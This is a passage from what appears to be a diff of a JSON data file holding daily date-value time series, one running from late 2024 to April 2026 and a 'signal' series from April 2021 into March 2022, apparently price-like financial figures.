"2024-10-31", + 29.809343338012695 + ], + [ + "2024-11-01", + 30.54244041442871 + ], + [ + "2024-11-04", + 30.066917419433594 + ], + [ + "2024-11-05", + 31.087308883666992 + ], + [ + "2024-11-06", + 33.801753997802734 + ], + [ + "2024-11-07", + 35.872257232666016 + ], + [ + "2024-11-08", + 35.07971954345703 + ], + [ + "2024-11-11", + 32.46434783935547 + ], + [ + "2024-11-12", + 31.37460708618164 + ], + [ + "2024-11-13", + 29.413074493408203 + ], + [ + "2024-11-14", + 29.32391357421875 + ], + [ + "2024-11-15", + 26.411334991455078 + ], + [ + "2024-11-18", + 27.411914825439453 + ], + [ + "2024-11-19", + 27.59023666381836 + ], + [ + "2024-11-20", + 26.876951217651367 + ], + [ + "2024-11-21", + 28.224266052246094 + ], + [ + "2024-11-22", + 28.224266052246094 + ], + [ + "2024-11-25", + 29.05643081665039 + ], + [ + "2024-11-26", + 27.867624282836914 + ], + [ + "2024-11-27", + 26.728349685668945 + ], + [ + "2024-11-29", + 27.798274993896484 + ], + [ + "2024-12-02", + 29.918317794799805 + ], + [ + "2024-12-03", + 29.452699661254883 + ], + [ + "2024-12-04", + 30.59197425842285 + ], + [ + "2024-12-05", + 28.848390579223633 + ], + [ + "2024-12-06", + 29.333820343017578 + ], + [ + "2024-12-09", + 28.95736312866211 + ], + [ + "2024-12-10", + 26.80760383605957 + ], + [ + "2024-12-11", + 28.848390579223633 + ], + [ + "2024-12-12", + 28.194543838500977 + ], + [ + "2024-12-13", + 30.413654327392578 + ], + [ + "2024-12-16", + 32.20677185058594 + ], + [ + "2024-12-17", + 30.839643478393555 + ], + [ + "2024-12-18", + 27.57042121887207 + ], + [ + "2024-12-19", + 26.0546932220459 + ], + [ + "2024-12-20", + 27.045366287231445 + ], + [ + "2024-12-23", + 29.39691925048828 + ], + [ + "2024-12-24", + 30.281112670898438 + ], + [ + "2024-12-26", + 30.37052345275879 + ], + [ + "2024-12-27", + 29.496267318725586 + ], + [ + "2024-12-30", + 27.757686614990234 + ], + [ + "2024-12-31", + 27.13179588317871 + ], + [ + "2025-01-02", + 27.48944854736328 + ], + [ + "2025-01-03", + 29.625417709350586 + ], + [ + "2025-01-06", + 32.27799987792969 + ], + [ + "2025-01-07", + 30.946739196777344 + ], + [ + "2025-01-08", + 29.98307228088379 + ], + [ + "2025-01-10", + 27.876901626586914 + ], + [ + "2025-01-13", + 27.66827392578125 + ], + [ + "2025-01-14", + 27.936511993408203 + ], + [ + "2025-01-15", + 29.74463653564453 + ], + [ + "2025-01-16", + 29.794309616088867 + ], + [ + "2025-01-17", + 32.27799987792969 + ], + [ + "2025-01-21", + 33.47016525268555 + ], + [ + "2025-01-22", + 34.9206428527832 + ], + [ + "2025-01-23", + 34.692142486572266 + ], + [ + "2025-01-24", + 32.436954498291016 + ], + [ + "2025-01-27", + 24.8964786529541 + ], + [ + "2025-01-28", + 25.204458236694336 + ], + [ + "2025-01-29", + 25.512434005737305 + ], + [ + "2025-01-30", + 26.972843170166016 + ], + [ + "2025-01-31", + 26.84368896484375 + ], + [ + "2025-02-03", + 25.44289207458496 + ], + [ + "2025-02-04", + 26.07871437072754 + ], + [ + "2025-02-05", + 27.519254684448242 + ], + [ + "2025-02-06", + 27.509319305419922 + ], + [ + "2025-02-07", + 26.158191680908203 + ], + [ + "2025-02-10", + 27.171537399291992 + ], + [ + "2025-02-11", + 27.221210479736328 + ], + [ + "2025-02-12", + 27.36029624938965 + ], + [ + "2025-02-13", + 28.28422737121582 + ], + [ + "2025-02-14", + 28.363706588745117 + ], + [ + "2025-02-18", + 29.794309616088867 + ], + [ + "2025-02-19", + 31.2646541595459 + ], + [ + "2025-02-20", + 31.493154525756836 + ], + [ + "2025-02-21", + 28.622011184692383 + ], + [ + "2025-02-24", + 26.58538818359375 + ], + [ + "2025-02-25", + 24.906414031982422 + ], + [ + "2025-02-26", + 26.118453979492188 + ], + [ + "2025-02-27", + 21.608078002929688 + ], + [ + "2025-02-28", + 22.581684112548828 + ], + [ + "2025-03-03", + 20.376169204711914 + ], + [ + "2025-03-04", + 20.515254974365234 + ], + [ + "2025-03-05", + 21.806774139404297 + ], + [ + "2025-03-06", + 19.104520797729492 + ], + [ + "2025-03-07", + 20.74375343322754 + ], + [ + "2025-03-10", + 17.87261199951172 + ], + [ + "2025-03-11", + 17.296398162841797 + ], + [ + "2025-03-12", + 18.180587768554688 + ], + [ + "2025-03-13", + 17.971960067749023 + ], + [ + "2025-03-14", + 19.670799255371094 + ], + [ + "2025-03-17", + 20.654342651367188 + ], + [ + "2025-03-18", + 19.79995346069336 + ], + [ + "2025-03-19", + 20.24701690673828 + ], + [ + "2025-03-20", + 19.79995346069336 + ], + [ + "2025-03-21", + 19.154193878173828 + ], + [ + "2025-03-24", + 20.862972259521484 + ], + [ + "2025-03-25", + 20.479293823242188 + ], + [ + "2025-03-26", + 18.725353240966797 + ], + [ + "2025-03-27", + 17.698894500732422 + ], + [ + "2025-03-28", + 15.974847793579102 + ], + [ + "2025-03-31", + 15.895122528076172 + ], + [ + "2025-04-01", + 15.895122528076172 + ], + [ + "2025-04-02", + 16.204055786132812 + ], + [ + "2025-04-03", + 11.370742797851562 + ], + [ + "2025-04-04", + 8.699963569641113 + ], + [ + "2025-04-07", + 9.118517875671387 + ], + [ + "2025-04-08", + 8.221614837646484 + ], + [ + "2025-04-09", + 12.72606372833252 + ], + [ + "2025-04-10", + 9.596866607666016 + ], + [ + "2025-04-11", + 10.194802284240723 + ], + [ + "2025-04-14", + 10.433977127075195 + ], + [ + "2025-04-15", + 10.563529968261719 + ], + [ + "2025-04-16", + 9.30786418914795 + ], + [ + "2025-04-17", + 9.168346405029297 + ], + [ + "2025-04-21", + 8.680032730102539 + ], + [ + "2025-04-22", + 9.148415565490723 + ], + [ + "2025-04-23", + 10.254596710205078 + ], + [ + "2025-04-24", + 11.958712577819824 + ], + [ + "2025-04-25", + 12.2975435256958 + ], + [ + "2025-04-28", + 12.24771499633789 + ], + [ + "2025-04-29", + 11.819193840026855 + ], + [ + "2025-04-30", + 12.118162155151367 + ], + [ + "2025-05-01", + 12.058368682861328 + ], + [ + "2025-05-02", + 13.244274139404297 + ], + [ + "2025-05-05", + 13.00510025024414 + ], + [ + "2025-05-06", + 12.596510887145996 + ], + [ + "2025-05-07", + 13.234308242797852 + ], + [ + "2025-05-08", + 13.613001823425293 + ], + [ + "2025-05-09", + 14.061452865600586 + ], + [ + "2025-05-12", + 17.071062088012695 + ], + [ + "2025-05-13", + 18.5360050201416 + ], + [ + "2025-05-14", + 18.775178909301758 + ], + [ + "2025-05-15", + 18.406450271606445 + ], + [ + "2025-05-16", + 18.32672691345215 + ], + [ + "2025-05-19", + 17.997861862182617 + ], + [ + "2025-05-20", + 17.908170700073242 + ], + [ + "2025-05-21", + 16.941509246826172 + ], + [ + "2025-05-22", + 16.453195571899414 + ], + [ + "2025-05-23", + 15.675878524780273 + ], + [ + "2025-05-27", + 17.230512619018555 + ], + [ + "2025-05-28", + 16.981372833251953 + ], + [ + "2025-05-29", + 17.140823364257812 + ], + [ + "2025-05-30", + 16.114364624023438 + ], + [ + "2025-06-02", + 16.841854095458984 + ], + [ + "2025-06-03", + 18.237035751342773 + ], + [ + "2025-06-04", + 19.02431869506836 + ], + [ + "2025-06-05", + 18.745283126831055 + ], + [ + "2025-06-06", + 19.1140079498291 + ], + [ + "2025-06-09", + 20.509193420410156 + ], + [ + "2025-06-10", + 21.81468391418457 + ], + [ + "2025-06-11", + 21.56554412841797 + ], + [ + "2025-06-12", + 21.615373611450195 + ], + [ + "2025-06-13", + 19.971052169799805 + ], + [ + "2025-06-16", + 21.82465171813965 + ], + [ + "2025-06-17", + 21.346302032470703 + ], + [ + "2025-06-18", + 21.5356502532959 + ], + [ + "2025-06-20", + 21.13702392578125 + ], + [ + "2025-06-23", + 21.50575065612793 + ], + [ + "2025-06-24", + 23.943044662475586 + ], + [ + "2025-06-25", + 24.572860717773438 + ], + [ + "2025-06-26", + 25.19268226623535 + ], + [ + "2025-06-27", + 25.102706909179688 + ], + [ + "2025-06-30", + 25.102706909179688 + ], + [ + "2025-07-01", + 24.702821731567383 + ], + [ + "2025-07-02", + 26.04243278503418 + ], + [ + "2025-07-03", + 26.42232322692871 + ], + [ + "2025-07-07", + 24.96274757385254 + ], + [ + "2025-07-08", + 26.362340927124023 + ], + [ + "2025-07-09", + 26.64225959777832 + ], + [ + "2025-07-10", + 27.362051010131836 + ], + [ + "2025-07-11", + 27.282073974609375 + ], + [ + "2025-07-14", + 26.4923038482666 + ], + [ + "2025-07-15", + 27.282073974609375 + ], + [ + "2025-07-16", + 27.02215003967285 + ], + [ + "2025-07-17", + 27.31206512451172 + ], + [ + "2025-07-18", + 27.32206153869629 + ], + [ + "2025-07-21", + 27.49201202392578 + ], + [ + "2025-07-22", + 26.312355041503906 + ], + [ + "2025-07-23", + 25.772512435913086 + ], + [ + "2025-07-24", + 25.612560272216797 + ], + [ + "2025-07-25", + 25.592565536499023 + ], + [ + "2025-07-28", + 26.8721923828125 + ], + [ + "2025-07-29", + 27.02215003967285 + ], + [ + "2025-07-30", + 27.60198211669922 + ], + [ + "2025-07-31", + 24.97274398803711 + ], + [ + "2025-08-01", + 24.07300567626953 + ], + [ + "2025-08-04", + 24.992738723754883 + ], + [ + "2025-08-05", + 24.51287841796875 + ], + [ + "2025-08-06", + 23.9830322265625 + ], + [ + "2025-08-07", + 24.992738723754883 + ], + [ + "2025-08-08", + 25.702531814575195 + ], + [ + "2025-08-11", + 25.602561950683594 + ], + [ + "2025-08-12", + 27.991867065429688 + ], + [ + "2025-08-13", + 29.261499404907227 + ], + [ + "2025-08-14", + 29.411455154418945 + ], + [ + "2025-08-15", + 27.362051010131836 + ], + [ + "2025-08-18", + 27.522005081176758 + ], + [ + "2025-08-19", + 26.232378005981445 + ], + [ + "2025-08-20", + 25.792505264282227 + ], + [ + "2025-08-21", + 25.34263801574707 + ], + [ + "2025-08-22", + 27.442028045654297 + ], + [ + "2025-08-25", + 27.292070388793945 + ], + [ + "2025-08-26", + 27.931884765625 + ], + [ + "2025-08-27", + 28.171815872192383 + ], + [ + "2025-08-28", + 28.521713256835938 + ], + [ + "2025-08-29", + 26.032438278198242 + ], + [ + "2025-09-02", + 25.242666244506836 + ], + [ + "2025-09-03", + 24.90276527404785 + ], + [ + "2025-09-04", + 25.642549514770508 + ], + [ + "2025-09-05", + 26.442317962646484 + ], + [ + "2025-09-08", + 27.072134017944336 + ], + [ + "2025-09-09", + 27.17210578918457 + ], + [ + "2025-09-10", + 28.591693878173828 + ], + [ + "2025-09-11", + 29.161527633666992 + ], + [ + "2025-09-12", + 29.291488647460938 + ], + [ + "2025-09-15", + 29.991287231445312 + ], + [ + "2025-09-16", + 30.471145629882812 + ], + [ + "2025-09-17", + 30.461149215698242 + ], + [ + "2025-09-18", + 33.63022994995117 + ], + [ + "2025-09-19", + 33.01041030883789 + ], + [ + "2025-09-22", + 34.41999816894531 + ], + [ + "2025-09-23", + 34.29999923706055 + ], + [ + "2025-09-24", + 34.20000076293945 + ], + [ + "2025-09-25", + 33.849998474121094 + ], + [ + "2025-09-26", + 34.02000045776367 + ], + [ + "2025-09-29", + 34.02000045776367 + ], + [ + "2025-09-30", + 34.84000015258789 + ], + [ + "2025-10-01", + 36.86000061035156 + ], + [ + "2025-10-02", + 39.08000183105469 + ], + [ + "2025-10-03", + 38.22999954223633 + ], + [ + "2025-10-06", + 41.709999084472656 + ], + [ + "2025-10-07", + 38.83000183105469 + ], + [ + "2025-10-08", + 42.779998779296875 + ], + [ + "2025-10-09", + 42.2400016784668 + ], + [ + "2025-10-10", + 34.209999084472656 + ], + [ + "2025-10-13", + 39.13999938964844 + ], + [ + "2025-10-14", + 36.630001068115234 + ], + [ + "2025-10-15", + 39.97999954223633 + ], + [ + "2025-10-16", + 40.56999969482422 + ], + [ + "2025-10-17", + 40.290000915527344 + ], + [ + "2025-10-20", + 42.2400016784668 + ], + [ + "2025-10-21", + 41.5099983215332 + ], + [ + "2025-10-22", + 38.38999938964844 + ], + [ + "2025-10-23", + 41.16999816894531 + ], + [ + "2025-10-24", + 43.13999938964844 + ], + [ + "2025-10-27", + 46.84000015258789 + ], + [ + "2025-10-28", + 46.959999084472656 + ], + [ + "2025-10-29", + 49.380001068115234 + ], + [ + "2025-10-30", + 47.38999938964844 + ], + [ + "2025-10-31", + 47.779998779296875 + ], + [ + "2025-11-03", + 48.58000183105469 + ], + [ + "2025-11-04", + 42.79999923706055 + ], + [ + "2025-11-05", + 46.83000183105469 + ], + [ + "2025-11-06", + 43.0099983215332 + ], + [ + "2025-11-07", + 41.7400016784668 + ], + [ + "2025-11-10", + 44.959999084472656 + ], + [ + "2025-11-11", + 41.810001373291016 + ], + [ + "2025-11-12", + 43.709999084472656 + ], + [ + "2025-11-13", + 39.220001220703125 + ], + [ + "2025-11-14", + 38.86000061035156 + ], + [ + "2025-11-17", + 36.84000015258789 + ], + [ + "2025-11-18", + 34.349998474121094 + ], + [ + "2025-11-19", + 35.959999084472656 + ], + [ + "2025-11-20", + 30.809999465942383 + ], + [ + "2025-11-21", + 31.729999542236328 + ], + [ + "2025-11-24", + 35.86000061035156 + ], + [ + "2025-11-25", + 36.16999816894531 + ], + [ + "2025-11-26", + 39.189998626708984 + ], + [ + "2025-11-28", + 41.2599983215332 + ], + [ + "2025-12-01", + 41.310001373291016 + ], + [ + "2025-12-02", + 43.79999923706055 + ], + [ + "2025-12-03", + 46.58000183105469 + ], + [ + "2025-12-04", + 45.15999984741211 + ], + [ + "2025-12-05", + 46.5 + ], + [ + "2025-12-08", + 47.9900016784668 + ], + [ + "2025-12-09", + 47.790000915527344 + ], + [ + "2025-12-10", + 49.650001525878906 + ], + [ + "2025-12-11", + 48.790000915527344 + ], + [ + "2025-12-12", + 41.709999084472656 + ], + [ + "2025-12-15", + 41.18000030517578 + ], + [ + "2025-12-16", + 40.4900016784668 + ], + [ + "2025-12-17", + 36.0099983215332 + ], + [ + "2025-12-18", + 38.58000183105469 + ], + [ + "2025-12-19", + 41.720001220703125 + ], + [ + "2025-12-22", + 43.2599983215332 + ], + [ + "2025-12-23", + 43.70000076293945 + ], + [ + "2025-12-24", + 44.209999084472656 + ], + [ + "2025-12-26", + 44.209999084472656 + ], + [ + "2025-12-29", + 43.81999969482422 + ], + [ + "2025-12-30", + 43.66999816894531 + ], + [ + "2025-12-31", + 42.029998779296875 + ], + [ + "2026-01-02", + 47.2400016784668 + ], + [ + "2026-01-05", + 49.220001220703125 + ], + [ + "2026-01-06", + 54.0099983215332 + ], + [ + "2026-01-07", + 52.290000915527344 + ], + [ + "2026-01-08", + 49.650001525878906 + ], + [ + "2026-01-09", + 53.95000076293945 + ], + [ + "2026-01-12", + 54.650001525878906 + ], + [ + "2026-01-13", + 56.06999969482422 + ], + [ + "2026-01-14", + 55.380001068115234 + ], + [ + "2026-01-15", + 58.08000183105469 + ], + [ + "2026-01-16", + 60.75 + ], + [ + "2026-01-20", + 57.939998626708984 + ], + [ + "2026-01-21", + 63.47999954223633 + ], + [ + "2026-01-22", + 63.720001220703125 + ], + [ + "2026-01-23", + 61.599998474121094 + ], + [ + "2026-01-26", + 60.70000076293945 + ], + [ + "2026-01-27", + 64.95999908447266 + ], + [ + "2026-01-28", + 70.08999633789062 + ], + [ + "2026-01-29", + 70.47000122070312 + ], + [ + "2026-01-30", + 61.790000915527344 + ], + [ + "2026-02-02", + 65.19999694824219 + ], + [ + "2026-02-03", + 61.20000076293945 + ], + [ + "2026-02-04", + 53.189998626708984 + ], + [ + "2026-02-05", + 53.25 + ], + [ + "2026-02-06", + 61.75 + ], + [ + "2026-02-09", + 64.02999877929688 + ], + [ + "2026-02-10", + 63.34000015258789 + ], + [ + "2026-02-11", + 68.05000305175781 + ], + [ + "2026-02-12", + 63.099998474121094 + ], + [ + "2026-02-13", + 64.58999633789062 + ], + [ + "2026-02-17", + 64.3499984741211 + ], + [ + "2026-02-18", + 66.29000091552734 + ], + [ + "2026-02-19", + 65.2300033569336 + ], + [ + "2026-02-20", + 67.11000061035156 + ], + [ + "2026-02-23", + 65.86000061035156 + ], + [ + "2026-02-24", + 68.52999877929688 + ], + [ + "2026-02-25", + 71.86000061035156 + ], + [ + "2026-02-26", + 65.33999633789062 + ], + [ + "2026-02-27", + 62.77000045776367 + ], + [ + "2026-03-02", + 62.7599983215332 + ], + [ + "2026-03-03", + 53.41999816894531 + ], + [ + "2026-03-04", + 56.619998931884766 + ], + [ + "2026-03-05", + 54.79999923706055 + ], + [ + "2026-03-06", + 47.88999938964844 + ], + [ + "2026-03-09", + 53.31999969482422 + ], + [ + "2026-03-10", + 54.59000015258789 + ], + [ + "2026-03-11", + 56.09000015258789 + ], + [ + "2026-03-12", + 50.279998779296875 + ], + [ + "2026-03-13", + 50.720001220703125 + ], + [ + "2026-03-16", + 53.689998626708984 + ], + [ + "2026-03-17", + 54.95000076293945 + ], + [ + "2026-03-18", + 54.02000045776367 + ], + [ + "2026-03-19", + 54.849998474121094 + ], + [ + "2026-03-20", + 51.13999938964844 + ], + [ + "2026-03-23", + 53.029998779296875 + ], + [ + "2026-03-24", + 54.959999084472656 + ], + [ + "2026-03-25", + 57.040000915527344 + ], + [ + "2026-03-26", + 48.970001220703125 + ], + [ + "2026-03-27", + 46.61000061035156 + ], + [ + "2026-03-30", + 40.619998931884766 + ], + [ + "2026-03-31", + 47.90999984741211 + ], + [ + "2026-04-01", + 52.2599983215332 + ], + [ + "2026-04-02", + 52.75 + ], + [ + "2026-04-06", + 54.810001373291016 + ], + [ + "2026-04-07", + 56.54999923706055 + ], + [ + "2026-04-08", + 67.5 + ], + [ + "2026-04-09", + 71.9800033569336 + ], + [ + "2026-04-10", + 76.38999938964844 + ], + [ + "2026-04-13", + 80.55999755859375 + ], + [ + "2026-04-14", + 85.30999755859375 + ], + [ + "2026-04-15", + 85.95999908447266 + ], + [ + "2026-04-16", + 88.37000274658203 + ], + [ + "2026-04-17", + 94.68000030517578 + ], + [ + "2026-04-20", + 95.94000244140625 + ], + [ + "2026-04-21", + 98.08999633789062 + ], + [ + "2026-04-22", + 105.63999938964844 + ], + [ + "2026-04-23", + 112.7699966430664 + ] + ], + "signal": [ + [ + "2021-04-16", + 141.3856964111328 + ], + [ + "2021-04-19", + 137.66925048828125 + ], + [ + "2021-04-20", + 135.70693969726562 + ], + [ + "2021-04-21", + 139.2665557861328 + ], + [ + "2021-04-22", + 136.23513793945312 + ], + [ + "2021-04-23", + 138.7191619873047 + ], + [ + "2021-04-26", + 141.2608184814453 + ], + [ + "2021-04-27", + 140.20126342773438 + ], + [ + "2021-04-28", + 138.0725860595703 + ], + [ + "2021-04-29", + 138.9688720703125 + ], + [ + "2021-04-30", + 135.09556579589844 + ], + [ + "2021-05-03", + 133.6902618408203 + ], + [ + "2021-05-04", + 131.4367218017578 + ], + [ + "2021-05-05", + 132.25938415527344 + ], + [ + "2021-05-06", + 133.34454345703125 + ], + [ + "2021-05-07", + 135.1755828857422 + ], + [ + "2021-05-10", + 129.16390991210938 + ], + [ + "2021-05-11", + 129.3367919921875 + ], + [ + "2021-05-12", + 124.0677719116211 + ], + [ + "2021-05-13", + 125.64913177490234 + ], + [ + "2021-05-14", + 129.53843688964844 + ], + [ + "2021-05-17", + 128.40846252441406 + ], + [ + "2021-05-18", + 127.37454223632812 + ], + [ + "2021-05-19", + 129.85853576660156 + ], + [ + "2021-05-20", + 133.2741241455078 + ], + [ + "2021-05-21", + 132.5378875732422 + ], + [ + "2021-05-24", + 135.88623046875 + ], + [ + "2021-05-25", + 136.28953552246094 + ], + [ + "2021-05-26", + 136.65444946289062 + ], + [ + "2021-05-27", + 137.23062133789062 + ], + [ + "2021-05-28", + 138.50473022460938 + ], + [ + "2021-06-01", + 138.11740112304688 + ], + [ + "2021-06-02", + 138.959228515625 + ], + [ + "2021-06-03", + 136.57122802734375 + ], + [ + "2021-06-04", + 139.88760375976562 + ], + [ + "2021-06-07", + 138.79920959472656 + ], + [ + "2021-06-08", + 138.00531005859375 + ], + [ + "2021-06-09", + 137.32672119140625 + ], + [ + "2021-06-10", + 138.9041748046875 + ], + [ + "2021-06-11", + 139.6060333251953 + ], + [ + "2021-06-14", + 141.5898895263672 + ], + [ + "2021-06-15", + 140.42971801757812 + ], + [ + "2021-06-16", + 139.10928344726562 + ], + [ + "2021-06-17", + 140.6091766357422 + ], + [ + "2021-06-18", + 137.2440185546875 + ], + [ + "2021-06-21", + 137.75042724609375 + ], + [ + "2021-06-22", + 138.40098571777344 + ], + [ + "2021-06-23", + 138.9778289794922 + ], + [ + "2021-06-24", + 141.33987426757812 + ], + [ + "2021-06-25", + 140.95529174804688 + ], + [ + "2021-06-28", + 144.3204803466797 + ], + [ + "2021-06-29", + 145.4518280029297 + ], + [ + "2021-06-30", + 145.57357788085938 + ], + [ + "2021-07-01", + 143.48719787597656 + ], + [ + "2021-07-02", + 144.36212158203125 + ], + [ + "2021-07-06", + 144.1153564453125 + ], + [ + "2021-07-07", + 141.93280029296875 + ], + [ + "2021-07-08", + 140.1091766357422 + ], + [ + "2021-07-09", + 142.39430236816406 + ], + [ + "2021-07-12", + 144.2211151123047 + ], + [ + "2021-07-13", + 143.64418029785156 + ], + [ + "2021-07-14", + 142.98086547851562 + ], + [ + "2021-07-15", + 139.80795288085938 + ], + [ + "2021-07-16", + 136.76966857910156 + ], + [ + "2021-07-19", + 136.63189697265625 + ], + [ + "2021-07-20", + 138.49392700195312 + ], + [ + "2021-07-21", + 142.746826171875 + ], + [ + "2021-07-22", + 141.9039306640625 + ], + [ + "2021-07-23", + 142.6282501220703 + ], + [ + "2021-07-26", + 142.67311096191406 + ], + [ + "2021-07-27", + 140.0547332763672 + ], + [ + "2021-07-28", + 142.34303283691406 + ], + [ + "2021-07-29", + 145.24668884277344 + ], + [ + "2021-07-30", + 146.43568420410156 + ], + [ + "2021-08-02", + 147.36192321777344 + ], + [ + "2021-08-03", + 148.48365783691406 + ], + [ + "2021-08-04", + 149.99635314941406 + ], + [ + "2021-08-05", + 150.02200317382812 + ], + [ + "2021-08-06", + 149.27523803710938 + ], + [ + "2021-08-09", + 148.76885986328125 + ], + [ + "2021-08-10", + 147.0414581298828 + ], + [ + "2021-08-11", + 146.53826904296875 + ], + [ + "2021-08-12", + 144.9646453857422 + ], + [ + "2021-08-13", + 145.87484741210938 + ], + [ + "2021-08-16", + 145.33323669433594 + ], + [ + "2021-08-17", + 142.51931762695312 + ], + [ + "2021-08-18", + 140.6348114013672 + ], + [ + "2021-08-19", + 141.78857421875 + ], + [ + "2021-08-20", + 142.85263061523438 + ], + [ + "2021-08-23", + 146.87474060058594 + ], + [ + "2021-08-24", + 146.87474060058594 + ], + [ + "2021-08-25", + 147.99330139160156 + ], + [ + "2021-08-26", + 148.131103515625 + ], + [ + "2021-08-27", + 150.9578399658203 + ], + [ + "2021-08-30", + 151.2591094970703 + ], + [ + "2021-08-31", + 150.05084228515625 + ], + [ + "2021-09-01", + 149.2335968017578 + ], + [ + "2021-09-02", + 149.79119873046875 + ], + [ + "2021-09-03", + 150.9129638671875 + ], + [ + "2021-09-07", + 150.3585205078125 + ], + [ + "2021-09-08", + 148.4323272705078 + ], + [ + "2021-09-09", + 148.9547882080078 + ], + [ + "2021-09-10", + 150.1373748779297 + ], + [ + "2021-09-13", + 151.576416015625 + ], + [ + "2021-09-14", + 151.5828399658203 + ], + [ + "2021-09-15", + 152.45452880859375 + ], + [ + "2021-09-16", + 152.74618530273438 + ], + [ + "2021-09-17", + 150.31044006347656 + ], + [ + "2021-09-20", + 146.58953857421875 + ], + [ + "2021-09-21", + 147.02220153808594 + ], + [ + "2021-09-22", + 150.0732879638672 + ], + [ + "2021-09-23", + 152.0731658935547 + ], + [ + "2021-09-24", + 151.8987579345703 + ], + [ + "2021-09-27", + 151.5292205810547 + ], + [ + "2021-09-28", + 145.60171508789062 + ], + [ + "2021-09-29", + 143.30458068847656 + ], + [ + "2021-09-30", + 143.24676513671875 + ], + [ + "2021-10-01", + 143.33995056152344 + ], + [ + "2021-10-04", + 139.64854431152344 + ], + [ + "2021-10-05", + 141.76246643066406 + ], + [ + "2021-10-06", + 142.3150634765625 + ], + [ + "2021-10-07", + 143.9792938232422 + ], + [ + "2021-10-08", + 142.50462341308594 + ], + [ + "2021-10-11", + 141.5504150390625 + ], + [ + "2021-10-12", + 139.783447265625 + ], + [ + "2021-10-13", + 140.5897979736328 + ], + [ + "2021-10-14", + 144.95274353027344 + ], + [ + "2021-10-15", + 145.91976928710938 + ], + [ + "2021-10-18", + 147.09564208984375 + ], + [ + "2021-10-19", + 148.89796447753906 + ], + [ + "2021-10-20", + 148.58956909179688 + ], + [ + "2021-10-21", + 150.08668518066406 + ], + [ + "2021-10-22", + 148.40321350097656 + ], + [ + "2021-10-25", + 149.4216766357422 + ], + [ + "2021-10-26", + 149.5341033935547 + ], + [ + "2021-10-27", + 148.4610595703125 + ], + [ + "2021-10-28", + 151.80874633789062 + ], + [ + "2021-10-29", + 152.4866180419922 + ], + [ + "2021-11-01", + 154.97329711914062 + ], + [ + "2021-11-02", + 156.90093994140625 + ], + [ + "2021-11-03", + 158.70970153808594 + ], + [ + "2021-11-04", + 164.04930114746094 + ], + [ + "2021-11-05", + 165.87094116210938 + ], + [ + "2021-11-08", + 168.11343383789062 + ], + [ + "2021-11-09", + 168.11343383789062 + ], + [ + "2021-11-10", + 163.1561279296875 + ], + [ + "2021-11-11", + 166.6066436767578 + ], + [ + "2021-11-12", + 168.23553466796875 + ], + [ + "2021-11-15", + 168.1102294921875 + ], + [ + "2021-11-16", + 170.62904357910156 + ], + [ + "2021-11-17", + 169.44032287597656 + ], + [ + "2021-11-18", + 172.2739715576172 + ], + [ + "2021-11-19", + 172.75267028808594 + ], + [ + "2021-11-22", + 170.24993896484375 + ], + [ + "2021-11-23", + 169.5655975341797 + ], + [ + "2021-11-24", + 171.42898559570312 + ], + [ + "2021-11-26", + 166.65805053710938 + ], + [ + "2021-11-29", + 173.0642852783203 + ], + [ + "2021-11-30", + 170.03147888183594 + ], + [ + "2021-12-01", + 168.6724395751953 + ], + [ + "2021-12-02", + 168.9166259765625 + ], + [ + "2021-12-03", + 168.48934936523438 + ], + [ + "2021-12-06", + 168.27406311035156 + ], + [ + "2021-12-07", + 176.76535034179688 + ], + [ + "2021-12-08", + 175.61520385742188 + ], + [ + "2021-12-09", + 171.57676696777344 + ], + [ + "2021-12-10", + 173.1959991455078 + ], + [ + "2021-12-13", + 168.58238220214844 + ], + [ + "2021-12-14", + 167.771484375 + ], + [ + "2021-12-15", + 173.93064880371094 + ], + [ + "2021-12-16", + 166.3427276611328 + ], + [ + "2021-12-17", + 165.9501190185547 + ], + [ + "2021-12-20", + 164.65008544921875 + ], + [ + "2021-12-21", + 170.59043884277344 + ], + [ + "2021-12-22", + 172.363525390625 + ], + [ + "2021-12-23", + 174.0304718017578 + ], + [ + "2021-12-27", + 178.79942321777344 + ], + [ + "2021-12-28", + 176.8268280029297 + ], + [ + "2021-12-29", + 177.09715270996094 + ], + [ + "2021-12-30", + 175.09344482421875 + ], + [ + "2021-12-31", + 174.56549072265625 + ], + [ + "2022-01-03", + 178.03543090820312 + ], + [ + "2022-01-04", + 177.48822021484375 + ], + [ + "2022-01-05", + 171.4592742919922 + ], + [ + "2022-01-06", + 172.79188537597656 + ], + [ + "2022-01-07", + 167.78013610839844 + ], + [ + "2022-01-10", + 167.8412628173828 + ], + [ + "2022-01-11", + 170.99899291992188 + ], + [ + "2022-01-12", + 172.25436401367188 + ], + [ + "2022-01-13", + 168.23397827148438 + ], + [ + "2022-01-14", + 172.26077270507812 + ], + [ + "2022-01-18", + 164.561279296875 + ], + [ + "2022-01-19", + 159.72006225585938 + ], + [ + "2022-01-20", + 154.7115478515625 + ], + [ + "2022-01-21", + 152.1364288330078 + ], + [ + "2022-01-24", + 153.8746337890625 + ], + [ + "2022-01-25", + 148.13217163085938 + ], + [ + "2022-01-26", + 150.40792846679688 + ], + [ + "2022-01-27", + 143.71266174316406 + ], + [ + "2022-01-28", + 146.46803283691406 + ], + [ + "2022-01-31", + 154.3349151611328 + ], + [ + "2022-02-01", + 155.61927795410156 + ], + [ + "2022-02-02", + 159.54945373535156 + ], + [ + "2022-02-03", + 152.60638427734375 + ], + [ + "2022-02-04", + 153.4818878173828 + ], + [ + "2022-02-07", + 153.39503479003906 + ], + [ + "2022-02-08", + 157.27371215820312 + ], + [ + "2022-02-09", + 162.43360900878906 + ], + [ + "2022-02-10", + 157.3703155517578 + ], + [ + "2022-02-11", + 149.36178588867188 + ], + [ + "2022-02-14", + 149.50338745117188 + ], + [ + "2022-02-15", + 157.75335693359375 + ], + [ + "2022-02-16", + 157.8048553466797 + ], + [ + "2022-02-17", + 151.87893676757812 + ], + [ + "2022-02-18", + 150.18255615234375 + ], + [ + "2022-02-22", + 149.26840209960938 + ], + [ + "2022-02-23", + 145.7115936279297 + ], + [ + "2022-02-24", + 151.04202270507812 + ], + [ + "2022-02-25", + 153.55918884277344 + ], + [ + "2022-02-28", + 152.62571716308594 + ], + [ + "2022-03-01", + 147.09246826171875 + ], + [ + "2022-03-02", + 151.76951599121094 + ], + [ + "2022-03-03", + 148.5860137939453 + ], + [ + "2022-03-04", + 144.64291381835938 + ], + [ + "2022-03-07", + 137.38760375976562 + ], + [ + "2022-03-08", + 140.02061462402344 + ], + [ + "2022-03-09", + 145.88861083984375 + ], + [ + "2022-03-10", + 142.8950958251953 + ], + [ + "2022-03-11", + 139.8275146484375 + ], + [ + "2022-03-14", + 135.3017578125 + ], + [ + "2022-03-15", + 141.52061462402344 + ], + [ + "2022-03-16", + 148.8081512451172 + ], + [ + 